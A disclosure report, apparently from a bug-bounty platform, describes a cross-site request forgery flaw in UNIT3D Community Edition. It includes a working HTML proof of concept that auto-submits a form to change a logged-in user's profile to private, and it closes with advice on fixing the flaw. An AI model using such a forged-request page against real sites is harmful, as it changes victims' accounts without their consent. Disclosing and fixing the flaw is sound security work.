Cross-Site Request Forgery (CSRF) in hdinnovations/unit3d-community-edition
Aug 4th 2021
Attacker is able to change a user profile state to private if a logged in user visits attacker website.
🕵️♂️ Proof of Concept
- when you logged in open this
POC.htmlin a browser
- you can check your profile state changed form public to private
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://unit3d.site/users/UNIT3D/settings/private"> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
This vulnerability is capable of forging user to unintentional profile state change to private.
Tested on Edge, firefox, chrome and safari.
You should set a CSRF token on such GET requests or you can use POST instead of GET then because of cookie SameSite is Lax, request from other origins could not carry cookie.